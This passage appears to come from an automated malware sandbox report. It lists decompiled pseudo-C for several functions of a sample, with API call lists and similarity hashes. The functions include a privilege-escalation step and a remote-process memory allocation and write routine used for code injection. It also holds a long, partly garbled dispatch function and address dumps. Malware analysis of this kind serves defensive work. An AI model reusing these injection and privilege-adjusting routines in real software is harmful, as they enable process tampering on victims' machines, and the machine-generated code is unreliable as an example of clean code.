                          						_t105 = _t105 + 1;
                          						if(__eflags != 0) {
                          							continue;
                          						}
                          						goto L12;
                          					}
                          					 *(_t166 + _t105 * 2) = 0;
                          					goto L19;
                          				}
                          			}

                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 006E4F6E
                          • CloseHandle.KERNEL32(?), ref: 006E5121
                          • CloseHandle.KERNEL32(?), ref: 006E5127
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$DirectorySystem
                          • String ID: \
                          • API String ID: 1693769833-2967466578
                          • Opcode ID: 91c23db3a6717debfe3cf5897fb3ea98c1adb1068a680118d0cfa9c1a0ca6f8a
                          • Instruction ID: da104fd815fa6c7c3a60b87a64823a400c75ceea21d6028f3ac3aa41570a1b92
                          • Opcode Fuzzy Hash: 91c23db3a6717debfe3cf5897fb3ea98c1adb1068a680118d0cfa9c1a0ca6f8a
                          • Instruction Fuzzy Hash: 6591E0716093429BD7209F2AD844BABB3E7AFD0708F14852CF589873A1EB71D946C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E006F2F10(void* __ecx) {
                          				char _v1036;
                          				struct _TOKEN_PRIVILEGES _v1052;
                          				struct _LUID _v1064;
                          				char _v1068;
                          				void* _v1072;
                          				void* _t10;
                          				intOrPtr _t12;
                          				void* _t14;
                          				struct _TOKEN_PRIVILEGES* _t23;
                          				char* _t25;
                          				HANDLE* _t27;
                          				WCHAR* _t28;
                          				void* _t29;
                          				long _t35;
                          				DWORD* _t36;
                          
                          				_t29 = __ecx;
                          				_t36 =  &_v1064;
                          				_t1 = _t29 + 0x10; // 0x2fa2a8
                          				_t10 = E006EC430( *_t1);
                          				_t35 = 0;
                          				if(_t10 == 0) {
                          					L9:
                          					return _t35;
                          				}
                          				_t12 =  *0x6f9ae8; // 0x1
                          				if(_t12 == 0) {
                          					goto L9;
                          				}
                          				if( *0x6f9c28 != 0) {
                          					L7:
                          					_t25 =  &_v1036;
                          					E006F4520(_t25, 0x9a);
                          					_push(_t25);
                          					_t14 = E006EC440();
                          					if(_t14 != 0) {
                          						_push(_t14);
                          						_t35 = E006ED350();
                          						E006E91E0(_t14);
                          					}
                          					goto L9;
                          				}
                          				_t27 =  &_v1072;
                          				 *_t27 = 0;
                          				 *_t36 = 0;
                          				if(OpenProcessToken(GetCurrentProcess(), 0x28, _t27) != 0) {
                          					_t28 =  &_v1036;
                          					E006F4520(_t28, 0x5f);
                          					_t36 =  &(_t36[2]);
                          					if(LookupPrivilegeValueW(0, _t28,  &_v1064) != 0) {
                          						_t23 =  &_v1068;
                          						_t23->PrivilegeCount = 1;
                          						_t23->Privileges[0].Luid = 2;
                          						AdjustTokenPrivileges(_v1072, 0, _t23, 0x10,  &_v1052, _t36);
                          					}
                          				}
                          				 *0x6f9c28 =  *0x6f9c28 + 1;
                          				goto L7;
                          			}

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 006F2F4E
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 006F2F58
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006F2F79
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?), ref: 006F2FA5
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                          • String ID:
                          • API String ID: 2349140579-0
                          • Opcode ID: 87ed292992afac0a8525cce33da95c2c4f761a2cd42e91fafd3e9315e039ebc9
                          • Instruction ID: 42814870239b18dedbaf273fef0ea0d7820b1a132525a31f06786b5c09308e97
                          • Opcode Fuzzy Hash: 87ed292992afac0a8525cce33da95c2c4f761a2cd42e91fafd3e9315e039ebc9
                          • Instruction Fuzzy Hash: BA21A1B16413056BE750AB21EC95FBB77EAAF88755F041828BA05C6292EA70D908CB71
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006E9CD0(void* __eax, void* _a4, void* _a8, long _a12) {
                          				void* _t5;
                          				void* _t10;
                          				SIZE_T* _t11;
                          				void* _t12;
                          				void* _t13;
                          				long _t14;
                          				SIZE_T* _t15;
                          
                          				_t14 = _a12;
                          				_t10 = _a4;
                          				_t5 = VirtualAllocEx(_t10, 0, _t14, 0x3000, 0x40);
                          				_t13 = 0;
                          				if(_t5 != 0) {
                          					_t12 = _t5;
                          					_t11 = _t15;
                          					 *_t11 = 0;
                          					if(WriteProcessMemory(_t10, _t12, _a8, _t14, _t11) == 0 ||  *_t15 != _t14) {
                          						VirtualFreeEx(_t10, _t12, 0, 0x8000);
                          					} else {
                          						_t13 = _t12;
                          					}
                          				}
                          				return _t13;
                          			}


                          APIs
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07
                          • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D23
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Virtual$AllocFreeMemoryProcessWrite
                          • String ID:
                          • API String ID: 3247110995-0
                          • Opcode ID: 8c0a119fb398ac421670c68d8e2cc6ec4b28438e6eda175a5bf0e0737895a0c0
                          • Instruction ID: 02ba26b2deaf33ab2b4448798ff80cad5a521ca00bc4c24ff8658c069efa2b28
                          • Opcode Fuzzy Hash: 8c0a119fb398ac421670c68d8e2cc6ec4b28438e6eda175a5bf0e0737895a0c0
                          • Instruction Fuzzy Hash: D6F0B4B1341754BBE3204F27DC45F677AADEF8AB94F210418FA45D7280D570E801C671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E006F5EB0(void* __ecx, void* __eflags) {
                          				signed char* _t133;
                          				intOrPtr _t134;
                          				signed int _t135;
                          				void* _t140;
                          				signed char _t144;
                          				signed char* _t146;
                          				signed char _t158;
                          				signed int _t161;
                          				intOrPtr _t163;
                          				signed int _t164;
                          				signed int _t165;
                          				signed int _t172;
                          				intOrPtr _t173;
                          				signed int _t174;
                          				signed int _t176;
                          				signed int _t177;
                          				signed int _t179;
                          				intOrPtr _t184;
                          				signed char* _t185;
                          				signed int _t186;
                          				void* _t187;
                          				signed int _t188;
                          				signed int _t190;
                          				signed int _t192;
                          				signed int _t193;
                          				signed int _t195;
                          				intOrPtr _t196;
                          				signed int _t197;
                          				signed char* _t198;
                          				signed int _t199;
                          				intOrPtr _t200;
                          				signed int _t204;
                          				signed int _t206;
                          				signed int _t208;
                          				signed int _t209;
                          				signed int _t210;
                          				signed int _t211;
                          				signed int* _t214;
                          				intOrPtr _t215;
                          				signed char* _t218;
                          				signed int _t219;
                          				intOrPtr _t220;
                          				signed int _t221;
                          				signed int* _t222;
                          				signed int _t227;
                          				WCHAR* _t229;
                          				signed int _t230;
                          				signed int _t235;
                          				signed int _t236;
                          				signed int _t237;
                          				signed int _t238;
                          				intOrPtr _t244;
                          				signed char* _t249;
                          				intOrPtr* _t250;
                          				intOrPtr* _t252;
                          				signed int _t253;
                          				intOrPtr _t254;
                          				intOrPtr _t255;
                          				signed int* _t258;
                          				signed int _t262;
                          				signed int* _t264;
                          				intOrPtr _t266;
                          				intOrPtr _t269;
                          				signed int _t270;
                          				signed int _t271;
                          				intOrPtr _t272;
                          				signed int _t273;
                          				signed char _t274;
                          				intOrPtr _t276;
                          				intOrPtr* _t277;
                          				signed int _t280;
                          				signed int _t284;
                          				signed int* _t285;
                          				void* _t286;
                          				signed int* _t290;
                          				signed int _t291;
                          				void* _t292;
                          				signed char _t293;
                          				signed int _t294;
                          				void* _t295;
                          				WCHAR* _t296;
                          				signed int _t297;
                          				signed int _t298;
                          				signed int _t299;
                          				signed int _t300;
                          				signed char* _t303;
                          				void* _t306;
                          				void* _t307;
                          				signed int* _t308;
                          				signed int* _t309;
                          				signed int* _t310;
                          				signed int* _t312;
                          				signed int* _t313;
                          
                          				_t286 = __ecx;
                          				_t235 = 0;
                          				_t302 = _t306 + 0x14;
                          				E006F6610(_t306 + 0x14, 0, 0x63c);
                          				_t307 = _t306 + 0xc;
                          				_t133 =  *0x6f9c08; // 0x308280
                          				_t133[0x490] = 0;
                          				_t244 =  *0x6f9b0c; // 0x2ef350
                          				 *(_t244 + 8) = 1;
                          				_t4 = _t244 + 0x24; // 0x0
                          				_t134 =  *_t4;
                          				if(_t134 == 0) {
                          					 *(_t244 + 8) = 2;
                          					_t135 = E006E5B70(0x83);
                          					_t308 = _t307 + 4;
                          					_t308[0xe] = _t135;
                          					L39:
                          					_t292 =  &(_t308[0x74]);
                          					_t303 =  *0x6f9c08; // 0x308280
                          					_t62 =  &(_t303[0x10]); // 0x308290
                          					_t303[8] =  *(_t292 - 0x188);
                          					_t303[0x494] =  *(_t292 - 0x198);
                          					_t303[0xc] =  *(_t292 - 0x19c);
                          					_t140 = memcpy(_t62, _t292, 0x20 << 2);
                          					_t309 =  &(_t308[3]);
                          					E006EC400(_t140,  &(_t309[0x94]), 0x400);
                          					_t310 =  &(_t309[3]);
                          					_t142 =  *_t303;
                          					if( *_t303 != 0) {
                          						E006E91E0(_t142);
                          						_t310 =  &(_t310[1]);
                          						_t303 =  *0x6f9c08; // 0x308280
                          					}
                          					_t71 =  &(_t303[4]); // 0x0
                          					_t143 =  *_t71;
                          					if( *_t71 != 0) {
                          						E006E91E0(_t143);
                          						_t310 =  &(_t310[1]);
                          					}
                          					_t248 = _t310[7];
                          					_t293 = 0;
                          					_t144 = 0;
                          					if(_t310[7] != 0) {
                          						_t144 = E006EB7A0(_t248);
                          						_t310 =  &(_t310[1]);
                          					}
                          					_t249 =  *0x6f9c08; // 0x308280
                          					 *_t249 = _t144;
                          					_t145 = _t310[8];
                          					if(_t310[8] != 0) {
                          						_t158 = E006EB7A0(_t145);
                          						_t310 =  &(_t310[1]);
                          						_t293 = _t158;
                          					}
                          					_t146 =  *0x6f9c08; // 0x308280
                          					_t146[4] = _t293;
                          					if(_t310[5] == 0) {
                          						L50:
                          						_t147 = _t310[0x10];
                          						if(_t310[0x10] != 0) {
                          							E006E91E0(_t147);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t148 = _t310[0xf];
                          						if(_t310[0xf] != 0) {
                          							E006E91E0(_t148);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t149 = _t310[6];
                          						if(_t310[6] != 0) {
                          							E006E91E0(_t149);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t150 = _t310[0xb];
                          						if(_t310[0xb] != 0) {
                          							E006E91E0(_t150);
                          						}
                          						return _t235;
                          					} else {
                          						_t294 = 0;
                          						do {
                          							E006E91E0( *((intOrPtr*)(_t310[6] + _t294 * 4)));
                          							_t310 =  &(_t310[1]);
                          							_t294 = _t294 + 1;
                          						} while (_t294 < _t310[5]);
                          						goto L50;
                          					}
                          				}
                          				_t250 = _t307 + 0x650;
                          				_t295 = _t307 + 0x18;
                          				 *_t250 = 0x20;
                          				_push(0xffffffff);
                          				_push(_t295);
                          				_push(_t250);
                          				_push(_t134);
                          				_t161 = E006E9FF0();
                          				_t312 = _t307 + 0x10;
                          				 *(_t295 - 4) = _t161;
                          				if((_t161 & 0xfffffffe) != 2) {
                          					_t163 =  *0x6f9b0c; // 0x2ef350
                          					 *(_t163 + 8) = 2;
                          					_push(0x84);
                          					L7:
                          					_t164 = E006E5B70();
                          					_t308 =  &(_t312[1]);
                          					_t308[0xe] = _t164;
                          					L8:
                          					_t235 = 0;
                          					goto L39;
                          				}
                          				_t165 = _t312[6];
                          				_t296 =  &(_t312[0x1c6]);
                          				_t312[7] =  *_t165;
                          				_t312[8] =  *(_t165 + 4);
                          				E006F4520(_t296, 0x80);
                          				_t313 =  &(_t312[2]);
                          				if(lstrcmpiW(_t313[9], _t296) == 0) {
                          					_t297 = 0;
                          					_t236 = 0;
                          					_t313[1] = 1;
                          				} else {
                          					E006F4520(_t296, 0x81);
                          					_t313 =  &(_t313[2]);
                          					if(lstrcmpiW(_t313[9], _t296) == 0) {
                          						_t236 = 0;
                          						_t297 = 1;
                          						__eflags = 1;
                          					} else {
                          						E006F4520(_t296, 0x82);
                          						_t313 =  &(_t313[2]);
                          						_t236 = 0 | lstrcmpiW(_t313[9], _t296) == 0x00000000;
                          						_t297 = 0;
                          					}
                          					_t313[1] = 0;
                          				}
                          				if(_t313[5] != 3) {
                          					L22:
                          					_t172 = E006F2E70( *((intOrPtr*)( &(_t313[0x10]) - 0x20)), 0,  &(_t313[0x10]), 0xffffffff);
                          					_t312 =  &(_t313[4]);
                          					__eflags = _t172;
                          					if(_t172 == 0) {
                          						_t173 =  *0x6f9b0c; // 0x2ef350
                          						 *(_t173 + 8) = 2;
                          						_push(0x86);
                          						goto L7;
                          					}
                          					_t252 =  *0x6f9a94; // 0x2fd120
                          					_t312[3] = _t297;
                          					 *_t312 = _t236;
                          					_t174 = E006E49B0(_t252, _t312[7]);
                          					__eflags = _t312[1];
                          					_t298 = _t174;
                          					if(_t312[1] == 0) {
                          						_t237 = 0;
                          						_t253 = 0;
                          						L35:
                          						__eflags = _t298;
                          						if(_t298 != 0) {
                          							L61:
                          							_t238 = _t253;
                          							_t176 = E006F2E70( *((intOrPtr*)(_t298 + 8)), 0,  &(_t312[0xf]), 0xffffffff);
                          							_t308 =  &(_t312[4]);
                          							__eflags = _t176;
                          							if(__eflags == 0) {
                          								goto L19;
                          							}
                          							_t255 =  *0x6f9a94; // 0x2fd120
                          							_t179 = E006F20F0(_t255, __eflags, _t298,  &(_t308[0x13]));
                          							__eflags = _t179;
                          							if(_t179 == 0) {
                          								_push(0x87);
                          								goto L20;
                          							}
                          							__eflags = _t308[1];
                          							if(_t308[1] == 0) {
                          								__eflags = _t308[3] |  *_t308;
                          								if((_t308[3] |  *_t308) == 0) {
                          									__eflags =  *(_t298 + 0x18);
                          									if( *(_t298 + 0x18) == 0) {
                          										_push(_t286);
                          										E006E38E0(_t298, _t302);
                          										_t308 =  &(_t308[3]);
                          									} else {
                          										E006ED950( *((intOrPtr*)(_t298 + 0x48)), _t298, _t302, _t286);
                          									}
                          									L99:
                          									_t235 = 1;
                          									goto L39;
                          								}
                          								_t184 =  *0x6f9b0c; // 0x2ef350
                          								_t235 = 1;
                          								 *((intOrPtr*)(_t184 + 8)) = 1;
                          								_t185 =  *0x6f9c08; // 0x308280
                          								_t185[0x490] = 1;
                          								__eflags =  *(_t298 + 0x18);
                          								if( *(_t298 + 0x18) == 0) {
                          									_t186 = E006F3420(_t298);
                          									__eflags = _t186;
                          									if(_t186 == 0) {
                          										_t187 = 0x89;
                          										L107:
                          										_t188 = E006E5B70(_t187);
                          										_t308 =  &(_t308[1]);
                          										_t308[0xe] = _t188;
                          										L108:
                          										_t258 =  *0x6f9a94; // 0x2fd120
                          										_push( *_t308);
                          										L109:
                          										_push(1);
                          										_push(_t298);
                          										E006ED6B0(_t258);
                          										goto L39;
                          									}
                          									_t190 = E006E1F50(_t186, _t298);
                          									__eflags = _t190;
                          									if(_t190 != 0) {
                          										goto L108;
                          									}
                          									_t187 = 0x8d;
                          									goto L107;
                          								}
                          								E006F0090(_t185,  *((intOrPtr*)(_t298 + 0x48)), _t298,  *_t308);
                          								goto L39;
                          							}
                          							_t192 = E006F3420(_t298);
                          							_t262 = _t298;
                          							__eflags = _t192;
                          							if(_t192 == 0) {
                          								_push(0);
                          								_t290 =  &(_t308[0x195]);
                          								L80:
                          								_push(_t290);
                          								_t193 = E006F1F80(_t262);
                          								__eflags = _t193;
                          								if(_t193 != 0) {
                          									L87:
                          									_t235 = 0;
                          									_t195 = E006EC110(_t298,  *((intOrPtr*)( &(_t308[0x94]) - 0x214)),  *((intOrPtr*)( &(_t308[0x94]) - 0x224)),  *((intOrPtr*)( &(_t308[0x94]) - 0x220)),  &(_t308[0x94]),  &(_t308[0x16]), 0, 0, 0);
                          									__eflags = _t195;
                          									if(_t195 == 0) {
                          										_t196 =  *0x6f9b0c; // 0x2ef350
                          										 *((intOrPtr*)(_t196 + 8)) = 7;
                          										_t197 = E006E5B70(0x8b);
                          										_t308 =  &(_t308[1]);
                          										_t258 =  *0x6f9a94; // 0x2fd120
                          										_t308[0xe] = _t197;
                          										_push(0);
                          										goto L109;
                          									}
                          									_t198 =  *0x6f9c08; // 0x308280
                          									_t198[0x490] = 1;
                          									goto L99;
                          								}
                          								_t199 = E006EB7A0(_t290);
                          								_t308 =  &(_t308[1]);
                          								_t308[0xe] = _t199;
                          								_t200 =  *0x6f9b0c; // 0x2ef350
                          								 *((intOrPtr*)(_t200 + 8)) = 7;
                          								_t264 =  *0x6f9a94; // 0x2fd120
                          								_push(1);
                          								_push(1);
                          								L105:
                          								_push(_t298);
                          								E006ED6B0(_t264);
                          								goto L8;
                          							}
                          							_t204 = E006E1F50(_t192, _t262);
                          							__eflags = _t204;
                          							_t290 =  &(_t308[0x194]);
                          							if(_t204 == 0) {
                          								__eflags =  *(_t298 + 0x30);
                          								if(__eflags == 0) {
                          									E006F5C10(_t298, __eflags);
                          									_t262 = _t298;
                          									_push(0);
                          									goto L80;
                          								}
                          								_t206 = E006E5B70(0x8a);
                          								_t308 =  &(_t308[1]);
                          								_t266 =  *0x6f9b0c; // 0x2ef350
                          								_t308[0xe] = _t206;
                          								 *((intOrPtr*)(_t266 + 8)) = 1;
                          								_t264 =  *0x6f9a94; // 0x2fd120
                          								_push(0);
                          								_push(1);
                          								goto L105;
                          							}
                          							__eflags = _t238;
                          							if(__eflags == 0) {
                          								E006F5C10(_t298, __eflags);
                          								_t208 = E006F1F80(_t298, _t290, 0);
                          								__eflags = _t208;
                          								if(_t208 == 0) {
                          									_t209 = E006EB7A0(_t290);
                          									_t308 =  &(_t308[1]);
                          									_t269 =  *0x6f9b0c; // 0x2ef350
                          									_t308[0xe] = _t209;
                          									 *((intOrPtr*)(_t269 + 8)) = 7;
                          									_t264 =  *0x6f9a94; // 0x2fd120
                          									_push(0);
                          									_push(1);
                          									goto L105;
                          								}
                          								goto L87;
                          							}
                          							_t210 = E006E3180(0x400, 0);
                          							_t308 =  &(_t308[2]);
                          							_t308[0xe] = _t210;
                          							_t211 = _t210 + 0xfffffffe;
                          							__eflags = _t211;
                          							_t284 = 0xfffffe00;
                          							_t270 = _t308[7];
                          							while(1) {
                          								_t299 =  *(_t270 + 0x400 + _t284 * 2) & 0x0000ffff;
                          								__eflags = _t299;
                          								if(_t299 == 0) {
                          									break;
                          								}
                          								 *(_t211 + 2) = _t299;
                          								_t211 = _t211 + 2;
                          								_t284 = _t284 + 1;
                          								__eflags = _t284;
                          								if(_t284 != 0) {
                          									continue;
                          								}
                          								L103:
                          								 *_t214 = 0;
                          								L38:
                          								_t215 =  *0x6f9b0c; // 0x2ef350
                          								_t235 = 0;
                          								__eflags = 0;
                          								 *(_t215 + 8) = 1;
                          								goto L39;
                          							}
                          							 *(_t211 + 2) = 0;
                          							E006F4520( &(_t308[0x1c7]), 0x8c);
                          							_t308 =  &(_t308[2]);
                          							_t285 = _t308[0xe];
                          							_t271 = 0x200;
                          							while(1) {
                          								__eflags =  *_t285;
                          								if( *_t285 == 0) {
                          									break;
                          								}
                          								_t285 =  &(_t285[0]);
                          								_t271 = _t271 - 1;
                          								__eflags = _t271;
                          								if(_t271 != 0) {
                          									continue;
                          								}
                          								goto L38;
                          							}
                          							_t300 = 0;
                          							__eflags = 0;
                          							while(1) {
                          								_t291 =  *(_t308 + 0x718 + _t300 * 2) & 0x0000ffff;
                          								_t214 = _t285;
                          								__eflags = _t291;
                          								if(_t291 == 0) {
                          									goto L103;
                          								}
                          								_t300 = _t300 + 1;
                          								_t285 =  &(_t214[0]);
                          								 *_t214 = _t291;
                          								__eflags = _t271 - _t300;
                          								if(_t271 != _t300) {
                          									continue;
                          								}
                          								goto L103;
                          							}
                          							goto L103;
                          						}
                          						L36:
                          						__eflags =  *_t312 | _t312[3];
                          						if(( *_t312 | _t312[3]) == 0) {
                          							_t312[2] = _t253;
                          							_t272 =  *0x6f9a94; // 0x2fd120
                          							_t218 =  &(_t312[4]);
                          							 *_t218 = 0;
                          							_push(_t218);
                          							_t219 = E006F3AC0(_t272, _t280, _t312[9], _t237);
                          							__eflags = _t219;
                          							if(_t219 == 0) {
                          								__eflags = _t312[4] - 1;
                          								if(_t312[4] == 1) {
                          									_t220 =  *0x6f9b0c; // 0x2ef350
                          									 *((intOrPtr*)(_t220 + 8)) = 4;
                          								}
                          								_push(0x85);
                          								goto L7;
                          							}
                          							_t253 = _t312[2];
                          							_t298 = _t219;
                          							goto L61;
                          						}
                          						_t221 = E006E5B70(0x89);
                          						_t308 =  &(_t312[1]);
                          						_t308[0xe] = _t221;
                          						goto L38;
                          					}
                          					_t222 = _t312[8];
                          					_t237 = 0;
                          					_t273 =  *_t222;
                          					__eflags = _t273 - 0x740073;
                          					if(_t273 == 0x740073) {
                          						__eflags = _t222[1] - 0x720041;
                          						_t51 = _t222[1] == 0x720041;
                          						__eflags = _t51;
                          						_t274 = _t273 & 0xffffff00 | _t51;
                          					} else {
                          						__eflags = _t273 - 0x540073;
                          						_t274 = 0;
                          						if(_t273 == 0x540073) {
                          							__eflags = _t222[1] - 0x720061;
                          							_t237 = 0 | _t222[1] == 0x00720061;
                          							_t274 = _t237;
                          						}
                          					}
                          					_t253 = _t274 & 0x000000ff;
                          					__eflags = _t298;
                          					if(_t298 == 0) {
                          						goto L35;
                          					} else {
                          						__eflags = _t237 | _t253;
                          						if((_t237 | _t253) != 0) {
                          							goto L35;
                          						}
                          						_t312[2] = _t253;
                          						do {
                          							E006EDCC0(_t298,  *((intOrPtr*)(_t298 + 0x44)));
                          							_t276 =  *0x6f9a94; // 0x2fd120
                          							E006F6660(_t276, _t312[8], 1);
                          							_t277 =  *0x6f9a94; // 0x2fd120
                          							_t227 = E006E49B0(_t277, _t312[7]);
                          							_t298 = _t227;
                          							__eflags = _t227;
                          						} while (_t227 != 0);
                          						_t253 = _t312[2];
                          						goto L36;
                          					}
                          				} else {
                          					_t229 =  *(_t313[6] + 8);
                          					_t313[9] = _t229;
                          					if(_t229 == 0) {
                          						L18:
                          						_t313[0xa] = 0;
                          						L19:
                          						_push(0x86);
                          						L20:
                          						_t177 = E006E5B70();
                          						_t308 =  &(_t308[1]);
                          						_t254 =  *0x6f9b0c; // 0x2ef350
                          						_t308[0xe] = _t177;
                          						_t235 = 0;
                          						 *(_t254 + 8) = 2;
                          						goto L39;
                          					}
                          					_t280 = 0;
                          					while(_t229[_t280] != 0) {
                          						_t280 = _t280 + 1;
                          						if(_t280 != 0x7fffffff) {
                          							continue;
                          						}
                          						_t313[0xa] = 0;
                          						goto L18;
                          					}
                          					 *( &(_t313[0xc]) - 8) = _t280;
                          					_t302 =  &(_t313[7]);
                          					_t230 = E006F08A0(_t229, _t229, _t280,  &(_t313[0xc]),  &(_t313[0xc]));
                          					__eflags = _t230;
                          					if(_t230 == 0) {
                          						_push(0x88);
                          						goto L20;
                          					}
                          					goto L22;
                          				}
                          			}
                          0x00000000
                          0x006f6564
                          0x006f6438
                          0x006f643d
                          0x006f6440
                          0x006f6448
                          0x006f644d
                          0x006f6450
                          0x006f6456
                          0x006f6458
                          0x00000000
                          0x006f6458
                          0x006f6333
                          0x006f6335
                          0x006f647a
                          0x006f6484
                          0x006f6489
                          0x006f648b
                          0x006f65a5
                          0x006f65aa
                          0x006f65ad
                          0x006f65b3
                          0x006f65b7
                          0x006f65be
                          0x006f65c4
                          0x006f65c6
                          0x00000000
                          0x006f65c6
                          0x00000000
                          0x006f648b
                          0x006f6342
                          0x006f6347
                          0x006f634a
                          0x006f634e
                          0x006f634e
                          0x006f6351
                          0x006f6356
                          0x006f635a
                          0x006f635a
                          0x006f6362
                          0x006f6365
                          0x00000000
                          0x00000000
                          0x006f636b
                          0x006f636f
                          0x006f6372
                          0x006f6372
                          0x006f6373
                          0x00000000
                          0x00000000
                          0x006f659a
                          0x006f659a
                          0x006f616f
                          0x006f616f
                          0x006f6174
                          0x006f6174
                          0x006f6176
                          0x00000000
                          0x006f6176
                          0x006f6526
                          0x006f6539
                          0x006f653e
                          0x006f6541
                          0x006f6545
                          0x006f654a
                          0x006f654a
                          0x006f654e
                          0x00000000
                          0x00000000
                          0x006f6550
                          0x006f6553
                          0x006f6553
                          0x006f6554
                          0x00000000
                          0x00000000
                          0x00000000
                          0x006f6556
                          0x006f657e
                          0x006f657e
                          0x006f6580
                          0x006f6580
                          0x006f6588
                          0x006f658a
                          0x006f658d
                          0x00000000
                          0x00000000
                          0x006f658f
                          0x006f6590
                          0x006f6593
                          0x006f6596
                          0x006f6598
                          0x00000000
                          0x00000000
                          0x00000000
                          0x006f6598
                          0x00000000
                          0x006f6580
                          0x006f6151
                          0x006f6154
                          0x006f6158
                          0x006f629f
                          0x006f62a3
                          0x006f62a9
                          0x006f62ad
                          0x006f62b3
                          0x006f62b9
                          0x006f62be
                          0x006f62c0
                          0x006f63cc
                          0x006f63d1
                          0x006f63d3
                          0x006f63d8
                          0x006f63d8
                          0x006f63df
                          0x00000000
                          0x006f63df
                          0x006f62c6
                          0x006f62ca
                          0x00000000
                          0x006f62ca
                          0x006f6163
                          0x006f6168
                          0x006f616b
                          0x00000000
                          0x006f616b
                          0x006f60af
                          0x006f60b3
                          0x006f60b5
                          0x006f60b7
                          0x006f60bd
                          0x006f60f8
                          0x006f60ff
                          0x006f60ff
                          0x006f60ff
                          0x006f60bf
                          0x006f60bf
                          0x006f60c5
                          0x006f60ca
                          0x006f60ce
                          0x006f60d5
                          0x006f60d8
                          0x006f60d8
                          0x006f60ca
                          0x006f6102
                          0x006f6105
                          0x006f6107
                          0x00000000
                          0x006f6109
                          0x006f610b
                          0x006f610d
                          0x00000000
                          0x00000000
                          0x006f610f
                          0x006f6113
                          0x006f6118
                          0x006f611d
                          0x006f6129
                          0x006f612e
                          0x006f6138
                          0x006f613d
                          0x006f613f
                          0x006f613f
                          0x006f6143
                          0x00000000
                          0x006f6143
                          0x006f5ffd
                          0x006f6001
                          0x006f6006
                          0x006f600a
                          0x006f6026
                          0x006f6026
                          0x006f602e
                          0x006f602e
                          0x006f6033
                          0x006f6033
                          0x006f6038
                          0x006f603b
                          0x006f6041
                          0x006f6045
                          0x006f6047
                          0x00000000
                          0x006f6047
                          0x006f600c
                          0x006f600e
                          0x006f6015
                          0x006f601c
                          0x00000000
                          0x00000000
                          0x006f601e
                          0x00000000
                          0x006f601e
                          0x006f6059
                          0x006f6065
                          0x006f606b
                          0x006f6070
                          0x006f6072
                          0x006f637a
                          0x00000000
                          0x006f637a
                          0x00000000
                          0x006f6072

                          APIs
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F5F4C
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F5F6D
                          • lstrcmpiW.KERNEL32(?,?), ref: 006F5F8A
                            • Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C30
                            • Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C45
                            • Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C7B
                            • Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C89
                            • Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C97
                            • Part of subcall function 006EC110: lstrlen.KERNEL32(?), ref: 006EC154
                            • Part of subcall function 006E1F50: GetExitCodeThread.KERNEL32(?,?,?,?,006E391B), ref: 006E1F6A
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$lstrcmpi$CodeExitThreadlstrlen
                          • String ID:
                          • API String ID: 1549611325-0
                          • Opcode ID: 806676a9ac2160821656b73c3c3d18db0ff4a4b5fcef53e859bad7cfc76f4798
                          • Instruction ID: 4770a8ff2bbfbcbfa8c60e7313eaca9ba391f8fac0ae812f7628ca101706f306
